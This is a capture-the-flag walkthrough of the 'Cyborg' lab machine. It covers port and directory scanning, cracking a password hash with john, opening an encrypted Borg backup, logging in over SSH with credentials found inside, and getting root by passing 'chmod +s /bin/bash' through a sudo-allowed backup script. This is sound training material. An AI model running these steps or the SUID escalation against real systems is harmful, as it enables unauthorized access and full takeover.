🤖Cyborg

A box involving encrypted archives, source code analysis and more.

1.Scanning

1.1 Nmap

Using nmap to scan and identify open ports and services

nmap -Pn -sC -sV 10.10.116.223   

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 12:19 IST
Nmap scan report for 10.10.116.223
Host is up (0.18s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
5357/tcp filtered wsdapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.39 seconds

We find 2 open ports. 22 and 80 running ssh and a web server respectively
Port 80 takes us to a default Apache homepage

2. Reconnaisance

2.1 Gobuster

Directory brute forcing using gobuster on port 80

gobuster dir -u http://10.10.116.223 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.116.223
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/07/16 12:20:00 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 314] [--> http://10.10.116.223/admin/]
/etc                  (Status: 301) [Size: 312] [--> http://10.10.116.223/etc/]  
/server-status        (Status: 403) [Size: 278]                                  
                                                                                 
===============================================================
2022/07/16 12:25:45 Finished
===============================================================

Going over to /etc directory, we find a hash at /etc/squid/passwd to a music_archive

2.2 John

Coping the hash to hash.txt and running john to crack it

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt  

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (?)
1g 0:00:00:00 DONE (2022-07-16 12:43) 1.666g/s 64960p/s 64960c/s 64960C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We get a potential password squidward

2.3 `/admin`

Going over to /admin directory

Navigating the webpage to /admin/admin.html, we find a conversation

Here, there is a mention of squid proxy , and a backup of music_archive as well as potential usernames Josh, Adam and Alex
We can find the archive, and it has an option to download it from the homepage
Downloading the archive archive.tar and extracting it

tar -xvf archive.tar 

home/field/dev/final_archive/
home/field/dev/final_archive/hints.5
home/field/dev/final_archive/integrity.5
home/field/dev/final_archive/config
home/field/dev/final_archive/README
home/field/dev/final_archive/nonce
home/field/dev/final_archive/index.5
home/field/dev/final_archive/data/
home/field/dev/final_archive/data/0/
home/field/dev/final_archive/data/0/5
home/field/dev/final_archive/data/0/3
home/field/dev/final_archive/data/0/4
home/field/dev/final_archive/data/0/1

Reading the README file, we see that it is a Borg backup repository, and it gives us a link to the documentation

cat home/field/dev/final_archive/README 

This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

2.4 Borg Backup

Reading the documentations, we can see that Borg is a backup program with compression and encryption support
We can install borg in our Debian system with apt install borgbackup
We can list the files present using the option list and the path of the archive. A password is prompted, and we can use squidward which we had cracked earlier from the hash to show the archive

borg list home/field/dev/final_archive 

Enter passphrase for key /home/joseph/Desktop/Pentest/THM/cyborg/home/field/dev/final_archive: 
music_archive                        Tue, 2020-12-29 19:30:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]

We can extract the files in archive with the command extract and specifying the archive name

borg extract home/field/dev/final_archive/::music_archive 

Enter passphrase for key /home/joseph/Desktop/Pentest/THM/cyborg/home/field/dev/final_archive: 
~/Desktop/Pentest/THM/cyborg ❯ ls                                                                            5s
archive.tar  hash.txt  home
~/Desktop/Pentest/THM/cyborg ❯ cd home 
~/Desktop/Pentest/THM/cyborg/home ❯ ls
alex  field

The archive got extracted to the home directory
There is a note.txt in home/alex/Documents

Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3

This might be the login creds of alex

alex : S3cretP@s3

3. Gaining Access

3.1 SSH

We can ssh into the target with the credentials that we found.

ssh alex@10.10.116.223

The authenticity of host '10.10.116.223 (10.10.116.223)' can't be established.
ECDSA key fingerprint is SHA256:uB5ulnLcQitH1NC30YfXJUbdLjQLRvGhDRUgCSAD7F8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.116.223' (ECDSA) to the list of known hosts.
alex@10.10.116.223's password: 

Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

We can see that Alex can run /etc/mp3backups/backup.sh as root

sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

4. Privilege Escalation

Reading the script, we find that it is a script that compress mp3 files to an archive and can execute the command that we provide.

#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt


input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
  #a="/etc/mp3backups/backed_up_files.txt"
#  b=$(basename $input)
  #echo
#  echo "$line"
#done < "$input"

while getopts c: flag
do
	case "${flag}" in 
		c) command=${OPTARG};;
	esac
done



backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd

We can provide any command to run using -c

alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"
/home/alex/Music/image12.mp3
/home/alex/Music/image7.mp3
/home/alex/Music/image1.mp3
/home/alex/Music/image10.mp3
/home/alex/Music/image5.mp3
/home/alex/Music/image4.mp3
/home/alex/Music/image3.mp3
/home/alex/Music/image6.mp3
/home/alex/Music/image8.mp3
/home/alex/Music/image9.mp3
/home/alex/Music/image11.mp3
/home/alex/Music/image2.mp3

bash-4.3$ bash -p
bash-4.3 whoami
root
bash-4.3 cd /root/
bash-4.3 ls
root.txt
bash-4.3 cat root.txt

PreviousBolt NextHA Jocker CTF

Last updated 3 years ago

A box involving encrypted archives, source code analysis and more.

1.Scanning

1.1 Nmap

2. Reconnaisance

2.1 Gobuster

2.2 John

2.3 /admin

2.4 Borg Backup

3. Gaining Access

3.1 SSH

4. Privilege Escalation

2.3 `/admin`